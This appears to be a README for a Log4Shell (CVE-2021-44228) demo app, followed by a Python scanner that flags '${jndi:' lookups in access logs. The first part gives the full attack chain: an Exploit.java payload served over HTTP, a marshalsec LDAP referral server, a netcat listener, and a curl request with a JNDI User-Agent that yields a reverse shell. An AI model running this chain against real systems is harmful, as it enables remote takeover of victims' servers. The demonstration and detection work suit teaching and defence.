A Log4j-vulnerable app, used in a Log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability.
Compile Exploit.java and start an HTTP server:
cd Log4jExploitDemo/exploit
javac Exploit.java
- start the HTTP server with Python:
python3 -m http.server
- or with PHP:
php -S 127.0.0.1:8000
Start the LDAP server:
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
- start the LDAP server:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit"
Set up a netcat listener on the attacker machine:
nc -lnvp 9999
Run the vulnerable application:
- Gradle must be installed on the victim machine: https://gradle.org/install/
- ncat must be installed on the victim machine for this to work:
sudo apt install ncat
cd Log4jExploitDemo && gradle run
Trigger the exploit and get a reverse shell in the netcat listener:
curl -H 'User-Agent: ${jndi:ldap://<attacker-ip>:1389/Exploit}' http://<victim-ip>:9090
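
On the defending side, the request above leaves the lookup string wherever the User-Agent header is logged. The following is an added example, not part of the original demo: a Python scan over access-log lines that flags `${jndi:` lookups and extracts the callback endpoint for correlation with egress logs. It assumes a web server or proxy in front of the app writes Combined Log Format; the sample lines and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format (assumed): ip - user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# ${jndi:<scheme>://<host>[:port]/...}, the lookup form sent in the demo's User-Agent
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?',
    re.IGNORECASE,
)

def find_jndi_lookups(lines):
    """Return one finding per logged field that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        for field in ("request", "referer", "agent"):
            value = unquote(m.group(field))  # match percent-encoded copies too
            for hit in JNDI_RE.finditer(value):
                port = hit.group("port")
                findings.append({
                    "line": lineno,
                    "client": m.group("ip"),
                    "field": field,
                    "scheme": hit.group("scheme").lower(),
                    "callback_host": hit.group("host"),
                    "callback_port": int(port) if port else None,
                })
    return findings

def callback_endpoints(findings):
    """Unique (host, port) pairs to look for in egress/firewall logs."""
    pairs = {(f["callback_host"], f["callback_port"]) for f in findings}
    return sorted(pairs, key=lambda e: (e[0], e[1] or 0))

# Constructed sample lines (documentation-range addresses), not real traffic
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.74.0"',
    '203.0.113.5 - - [12/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/Exploit}"',
    '198.51.100.7 - - [12/Dec/2021:10:02:30 +0000] "GET /docs/jndi-ldap.html HTTP/1.1" 200 900 "-" "curl/7.74.0"',
    'application started on port 9090',
]

if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    print(found, callback_endpoints(found))
```

A hit in the log shows only that the string was received; an outbound connection from the application host to the extracted endpoint is what indicates the lookup was actually resolved.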